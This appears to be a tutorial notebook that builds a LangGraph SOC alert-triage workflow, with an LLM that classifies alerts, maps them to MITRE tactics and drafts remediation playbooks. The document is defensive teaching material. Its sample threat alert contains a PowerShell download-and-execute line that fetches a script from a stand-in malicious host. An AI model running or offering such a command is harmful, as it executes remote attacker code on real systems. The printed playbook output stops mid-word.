## 🛡️ Incident Triage using LangGraph (Blue Team Workflow)

This notebook demonstrates how to design a **conditional SOC workflow** using LangGraph.

The objective is to simulate a structured Blue Team triage process:

1. Tier 1 – Alert Classification  
2. Conditional Routing  
3. Tier 2 – Incident Diagnosis  
4. Tier 3 – Remediation Planning  
5. Auto-close path for false positives  

The focus is on understanding **LangGraph conditional workflows**, not production-level hardening.


In [1]:
from langgraph.graph import StateGraph, START, END
from langchain_groq import ChatGroq
from typing import TypedDict, Literal
from pydantic import BaseModel, Field
from dotenv import load_dotenv
import os

In [2]:
load_dotenv()

True

In [3]:
model = ChatGroq(
    model="llama-3.3-70b-versatile",
    api_key=os.getenv("GROQ_API_KEY"),
    temperature=0.1  # Lower temperature for higher consistency in security tasks
)

### Define Structured Output Schemas

We define Pydantic schemas to control how the LLM responds.

This ensures:
- Machine-readable outputs
- Deterministic routing decisions
- Clean state updates

Schemas represent:
- Alert validity (True / False Positive)
- Incident diagnosis details
- Remediation actions


In [4]:
class AlertValiditySchema(BaseModel):
    # Determines if the alert requires investigation or is known noise
    validity: Literal["true_positive", "false_positive"] = Field(description='Is the alert a real threat or noise?')

class IncidentDiagnosisSchema(BaseModel):
    # Technical deep-dive into the incident
    tactic: Literal["Initial Access", "Execution", "Persistence", "Exfiltration", "Other"] = Field(description='The Mitre ATT&CK Tactic')
    severity: Literal["low", "medium", "high", "critical"] = Field(description='Technical severity of the threat')
    requires_isolation: bool = Field(description='Does the affected host need immediate network isolation?')

In [5]:
validity_model = model.with_structured_output(AlertValiditySchema)
diagnosis_model = model.with_structured_output(IncidentDiagnosisSchema)

### Define SOC State

The SOCState acts as shared memory across all nodes.

Each node:
- Receives the current state
- Updates specific fields
- Passes the updated state forward

LangGraph uses this state object to determine routing and workflow progression.


In [6]:
class SOCState(TypedDict):
    alert_raw_text: str
    validity: str
    diagnosis: dict
    action_plan: str

### Tier 1: Alert Classification

This node simulates a Tier 1 SOC analyst.

Responsibilities:
- Analyze raw alert data
- Determine if it is a true positive or false positive
- Update the workflow state

This decision controls conditional routing.


In [7]:
def classify_alert(state: SOCState):
    """Tier 1 Analysis: Filter out the noise."""
    prompt = f"Analyze the following security alert and determine if it is a True Positive or False Positive:\n {state['alert_raw_text']}"
    result = validity_model.invoke(prompt).validity
    return {'validity': result}

### Conditional Routing Logic

This function determines the next workflow step based on classification results.

Routing Logic:
- If false_positive → Auto-close ticket
- If true_positive → Proceed to incident diagnosis

This is the core concept of LangGraph conditional workflows.


In [8]:
def check_validity(state: SOCState) -> Literal["auto_close_ticket", "incident_diagnosis"]:
    """Conditional Router based on validity."""
    if state["validity"] == 'false_positive':
        return 'auto_close_ticket'
    else:
        return 'incident_diagnosis'

In [9]:
def auto_close_ticket(state: SOCState):
    """Close low-risk/noise alerts automatically."""
    prompt = f"Write a brief SOC closure note for this False Positive alert:\n{state['alert_raw_text']}"
    response = model.invoke(prompt).content
    return {'action_plan': f"TICKET CLOSED: {response}"}

### Tier 2: Incident Diagnosis

If the alert is validated as a true positive, deeper analysis is performed.

This stage:
- Identifies attack context
- Maps behavior to MITRE ATT&CK tactics
- Assesses impact and severity

This simulates escalation from Tier 1 to Tier 2.


In [10]:
def incident_diagnosis(state: SOCState):
    """Tier 2 Analysis: Technical categorization."""
    prompt = f"Perform a technical diagnosis on this validated threat:\n{state['alert_raw_text']}"
    response = diagnosis_model.invoke(prompt)
    return {'diagnosis': response.model_dump()}

### Tier 3: Remediation Plan

For confirmed incidents, a structured remediation plan is generated.

This includes:
- Containment actions
- Investigation steps
- Recovery recommendations

This completes the triage lifecycle.


In [11]:
def remediation_plan(state: SOCState):
    """Tier 3 Analysis: Generate the Playbook steps."""
    diag = state['diagnosis']
    prompt = f"""You are a Senior Incident Responder. 
    The threat is categorized as '{diag['tactic']}' with '{diag['severity']}' severity. 
    Isolation required: {diag['requires_isolation']}.
    Write a high-priority remediation playbook for the local SOC team."""
    
    response = model.invoke(prompt).content
    return {'action_plan': response}

### Build the LangGraph Workflow

We now construct the workflow graph:

- Register nodes
- Define conditional edges
- Set the entry point
- Compile the graph

This defines the full SOC triage pipeline.


In [12]:
graph = StateGraph(SOCState)

graph.add_node('classify_alert', classify_alert)
graph.add_node('auto_close_ticket', auto_close_ticket)
graph.add_node('incident_diagnosis', incident_diagnosis)
graph.add_node('remediation_plan', remediation_plan)

graph.add_edge(START, 'classify_alert')
graph.add_conditional_edges('classify_alert', check_validity)

graph.add_edge('auto_close_ticket', END)
graph.add_edge('incident_diagnosis', 'remediation_plan')
graph.add_edge('remediation_plan', END)

workflow = graph.compile()

In [14]:
print(workflow.get_graph().draw_ascii())

                    +-----------+                      
                    | __start__ |                      
                    +-----------+                      
                           *                           
                           *                           
                           *                           
                  +----------------+                   
                  | classify_alert |                   
                  +----------------+                   
                  ...             ...                  
                ..                   ...               
              ..                        ..             
+--------------------+                    ..           
| incident_diagnosis |                     .           
+--------------------+                     .           
           *                               .           
           *                               .           
           *                               .    

### Execute the Workflow

We now provide a sample security alert to observe:

- Classification outcome
- Routing behavior
- Diagnosis results
- Remediation output (if applicable)

This demonstrates end-to-end conditional execution.


In [16]:
# Testing a False Positive (Noise)
noise_alert = {
    'alert_raw_text': "Alert: Multiple failed login attempts on Admin-PC from IP 127.0.0.1. User: SYSTEM. Reason: Service account password rotation."
}
print("--- TESTING FALSE POSITIVE ---")
print(workflow.invoke(noise_alert)['action_plan'])

--- TESTING FALSE POSITIVE ---
TICKET CLOSED: Here is a brief SOC closure note for the False Positive alert:

"Alert ID: [Insert Alert ID]
Closure Reason: False Positive
Description: The multiple failed login attempts on Admin-PC from IP 127.0.0.1 were caused by a scheduled service account password rotation, which is a legitimate automated process. The 'SYSTEM' user is a built-in account used for system services, and the failed login attempts were a result of the password rotation script attempting to authenticate with the old password before updating to the new one. No malicious activity is suspected, and the alert is being closed as a False Positive."


In [17]:
# Testing a True Positive (Threat)
threat_alert = {
    'alert_raw_text': "Alert: Suspicious PowerShell execution detected on Workstation-04. Script: 'IEX (New-Object Net.WebClient).DownloadString(\"http://malicious-cnc.com/shell.ps1\")'. User: J.Doe."
}
print("\n--- TESTING TRUE POSITIVE ---")
results = workflow.invoke(threat_alert)
print(f"DIAGNOSIS: {results['diagnosis']}")
print(f"REMEDIATION PLAN: {results['action_plan']}")


--- TESTING TRUE POSITIVE ---
DIAGNOSIS: {'tactic': 'Execution', 'severity': 'high', 'requires_isolation': True}
REMEDIATION PLAN: **High-Priority Remediation Playbook: Execution Threat with High Severity**

**Incident Overview:**
A high-severity Execution threat has been detected, requiring immediate attention and remediation to prevent further damage. This playbook outlines the necessary steps for the local SOC team to contain, eradicate, and recover from the threat.

**Initial Response (Time-Sensitive):**

1. **Alert and Notify**: Inform all relevant stakeholders, including the incident response team, management, and affected business units, about the high-severity threat.
2. **Activate Incident Response Protocol**: Trigger the incident response protocol to ensure all necessary personnel are engaged and aware of the situation.
3. **Gather Information**: Collect relevant logs, network captures, and system data to understand the scope and impact of the threat.

**Isolation and Contai